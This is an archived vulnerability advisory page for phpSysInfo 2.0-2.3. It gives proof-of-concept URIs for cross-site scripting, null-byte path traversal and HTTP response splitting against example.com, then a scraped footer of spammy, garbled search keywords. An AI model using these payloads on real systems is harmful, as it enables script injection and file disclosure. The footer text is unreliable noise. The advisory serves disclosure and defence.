exploits , vulnerabilities , articles , PHPSysInfo Multiple Input Validation Vulnerabilities

Title	PHPSysInfo Multiple Input Validation Vulnerabilities
Published	2005-11-11-12:00AM
Updated	2005-11-11-08:00PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	These issues were disclosed in the referenced Hardened-PHP Project advisory.
Vulnerable	phpSysInfo phpSysInfo 2.3 phpSysInfo phpSysInfo 2.1 phpSysInfo phpSysInfo 2.0 Debian Linux 3.0 Debian Linux 3.0 alpha Debian Linux 3.0 arm Debian Linux 3.0 hppa Debian Linux 3.0 ia32 Debian Linux 3.0 ia64 Debian Linux 3.0 m68k Debian Linux 3.0 mips Debian Linux 3.0 mipsel Debian Linux 3.0 ppc Debian Linux 3.0 s/390 Debian Linux 3.0 sparc
Not Vulnerable	phpSysInfo phpSysInfo 2.4
Code	No exploit is required. The following proof of concept URI are available: http://www.example.com/index.php?VERSION=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E http://www.example.com/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00 http://www.example.com/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00&lng=../../README%00 http://www.example.com//index.php?sensor_program=lmsensors.inc.php/../../README%00 http://www.example.com/index.php?charset=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Hacked!</html>
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-19 Serv-U File Server User Directory Information Disclosure Vulnerability
2009-12-18 ReVou Comment Field HTML Injection Vulnerability
2009-12-18 Adobe Flash Media Server Resource Exhaustion Remote Denial of Service Vulnerability
2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 04:35:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
all cartoo !C99Shell www.tm241. Cr\\r\\n00 Sex gril. Www.Bluefi SEX VIDEO Vulnerabil live blue cisco 12 bhavana http://hi. photo sxe mom and so strongdc Reshmasex\ Www.desy b www.imeee. vBadvance 89pic PHP/5.1.4 rom chat net cafe s gene 6 ftp sex teen www.400811 www.xiaohu Crack Data maxcpm.inf download f www.imeee. PHP/5.1.4 www.chance news for c w2k Soon18.Com WWW indiangirl php-nuke 2 www.sex pi all cartoo porno foto www.taobao suse remot 200 /compo Www.world oneAdmin fck editor Weptrick.c www.taobao